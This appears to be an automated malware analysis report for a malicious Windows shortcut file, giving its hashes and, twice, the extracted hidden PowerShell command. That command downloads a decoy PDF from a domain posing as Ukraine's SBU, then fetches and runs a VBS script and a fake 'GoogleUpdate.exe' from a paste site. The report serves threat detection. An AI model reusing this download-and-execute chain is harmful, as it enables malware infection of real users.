Malicious
Malicious

d624ea573893acfece46e82e4ce49998

LNK File
|
MD5: d624ea573893acfece46e82e4ce49998
|
Size: 3.8 KB
|
application/x-ms-shortcut

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
d624ea573893acfece46e82e4ce49998
Sha1
bfbb0cff367fc516642db9b0c3f6cf3a755c282b
Sha256
f7d46c07ea06e9b2def9a048c58d8f2608842d055f69515755e7fb5e5d9fdeab
Sha384
4b65aefd3f79041740c42661b856cdf369913b6b3889d003ce2f3b521d5f9d0813b83a79e65a6e7fe93b1cb8f9373db3
Sha512
a124b4c4d112e2d548aaa9f3987369a3ee0c48afa8c4f7e709b23e49b5fc2f48cda83d54ae319bf4ab2fe33c1446f0157155376d13b1c2889435d0175775f95a
SSDeep
48:8W3pOm2eOP+/5CrAApZxfnAuLXPC1lTUymbNwDd7f89vCf8vWZ:8KpN2SkEqtHNjVvWZ
TLSH
25714720B6FC0225E376697B6BFA916B0471B811BD1E8E6C0180C38F3919E59D971F6B
File Structure
d624ea573893acfece46e82e4ce49998
Malicious
LNK CommandLine
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -Nop -sta -noni -w hidden C:\Windows\System32\curl.exe -o C:\Users\Public\Звернення.pdf https://sbufiles.cloud/sbu/instructions/orders/%D0%97%D0%B2%D0%B5%D1%80%D0%BD%D0%B5%D0%BD%D0%BD%D1%8F_%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D1%8C%D0%BD%D0%B8%D0%BA%D0%B0_%D0%A3%D0%A1%D0%91%D0%A3_%D0%BF%D0%BE_%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80%D1%81%D1%8C%D0%BA%D1%96%D0%B9_%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%96_%D0%9A%D0%BE%D0%BC%D0%BF%D0%B0%D0%BD%D1%87%D0%B5%D0%BA%D0%BE_%D0%92_%D0%92.pdf/?id=783040939090732 --ssl-no-revoke; Invoke-Item -Path C:\Users\Public\Звернення.pdf; C:\Windows\System32\curl.exe -o C:\Users\Public\Downloads\gupdate.vbs https://paste.c-net.org/PasadenaDeepest --ssl-no-revoke; Invoke-Item -Path C:\Users\Public\Downloads\gupdate.vbs; C:\Windows\System32\curl.exe -o C:\Users\Public\Downloads\GoogleUpdate.exe https://paste.c-net.org/LeatherBlending --ssl-no-revoke; Remove-Item -Path C:\Users\Public\Downloads\gupdate.vbs
d624ea573893acfece46e82e4ce49998 (3.8 KB)
File Structure
d624ea573893acfece46e82e4ce49998
Malicious
LNK CommandLine
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -Nop -sta -noni -w hidden C:\Windows\System32\curl.exe -o C:\Users\Public\Звернення.pdf https://sbufiles.cloud/sbu/instructions/orders/%D0%97%D0%B2%D0%B5%D1%80%D0%BD%D0%B5%D0%BD%D0%BD%D1%8F_%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D1%8C%D0%BD%D0%B8%D0%BA%D0%B0_%D0%A3%D0%A1%D0%91%D0%A3_%D0%BF%D0%BE_%D0%96%D0%B8%D1%82%D0%BE%D0%BC%D0%B8%D1%80%D1%81%D1%8C%D0%BA%D1%96%D0%B9_%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%96_%D0%9A%D0%BE%D0%BC%D0%BF%D0%B0%D0%BD%D1%87%D0%B5%D0%BA%D0%BE_%D0%92_%D0%92.pdf/?id=783040939090732 --ssl-no-revoke; Invoke-Item -Path C:\Users\Public\Звернення.pdf; C:\Windows\System32\curl.exe -o C:\Users\Public\Downloads\gupdate.vbs https://paste.c-net.org/PasadenaDeepest --ssl-no-revoke; Invoke-Item -Path C:\Users\Public\Downloads\gupdate.vbs; C:\Windows\System32\curl.exe -o C:\Users\Public\Downloads\GoogleUpdate.exe https://paste.c-net.org/LeatherBlending --ssl-no-revoke; Remove-Item -Path C:\Users\Public\Downloads\gupdate.vbs

Malicious

d624ea573893acfece46e82e4ce49998
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙